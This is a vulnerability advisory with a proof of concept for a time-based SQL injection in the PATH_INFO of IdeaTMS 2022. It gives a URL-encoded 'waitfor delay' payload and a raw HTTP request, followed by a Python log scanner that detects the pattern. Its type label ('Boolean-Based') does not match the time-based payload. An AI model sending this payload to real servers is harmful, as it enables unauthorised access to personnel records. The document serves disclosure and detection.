CVE-2022-31787: SQL Injection Vulnerability PoC #2 - IdeaTMS

IdeaTMS 2022 is vulnerable to SQL Injection via the PATH_INFO


Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaTMS

Product Version: 2022

Description: IdeaTMS allows SQL Injection via the PATH_INFO

Attack Vectors: The attacker injects a malicious payload into PATH_INFO

Attack Type: Remote

Payload: zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20

Assigned CVE-ID: <TBD>

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1. Browse the following page: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/[PATH_INFO]

2. Insert the malicious query as the value in PATH_INFO

Example: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20

#PoC

GET /IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y'%3b%20waitfor%20delay%20'0:0:20'%20--%20 HTTP/1.1
Host: <address in which IdeaTMS is set up>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
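
A log check for the request pattern described above, added here as a defensive example (not code from the advisory or the vendor): it flags requests to the InfoDetails route whose PATH_INFO segment decodes to SQL metacharacters, or whose response time is in the range of the injected delay. The four-field log layout, the 15-second threshold and all function names are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Route from the advisory; the segment after it is the injectable PATH_INFO.
ROUTE = "/ideaweb/personnelinfo/infodetails/"
# Quote, statement separator, SQL comment, and the T-SQL delay from the payload.
SUSPICIOUS = re.compile(r"[';]|--|/\*|\bwaitfor\s+delay\b", re.I)
SLOW_MS = 15000  # assumed threshold; the advisory's payload delays 20 seconds


def parse_line(line):
    """Parse the assumed layout: method uri status time-taken-ms."""
    parts = line.split()
    if line.startswith("#") or len(parts) != 4:
        return None
    return {"uri": parts[1], "status": int(parts[2]), "ms": int(parts[3])}


def classify(entry):
    """Return the reasons an entry is suspicious (empty list when clean)."""
    path = entry["uri"].split("?", 1)[0].lower()
    if ROUTE not in path:
        return []
    # Decode twice so double-encoded input (%2527) is caught as well.
    segment = unquote(unquote(path.split(ROUTE, 1)[1]))
    reasons = []
    if SUSPICIOUS.search(segment):
        reasons.append("sql-metacharacters")
    if entry["ms"] >= SLOW_MS:
        reasons.append("slow-response")
    return reasons


def scan(lines):
    """Return (uri, reasons) for every flagged line."""
    entries = filter(None, map(parse_line, lines))
    return [(e["uri"], r) for e in entries if (r := classify(e))]


# Constructed sample log lines (not from a real system).
SAMPLE = [
    "GET /IdeaWeb/PersonnelInfo/InfoDetails/1042 200 38",
    "GET /IdeaWeb/PersonnelInfo/InfoDetails/x'%3b%20waitfor%20delay%20'0:0:20'%20--%20 200 20051",
    "GET /IdeaWeb/PersonnelInfo/InfoDetails/x%2527%253b 500 12",
    "GET /IdeaWeb/Home/Index 200 16020",
]

if __name__ == "__main__":
    for uri, reasons in scan(SAMPLE):
        print(", ".join(reasons), uri)
```

The slow request to /IdeaWeb/Home/Index is not reported because the check is scoped to the route named in the advisory.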
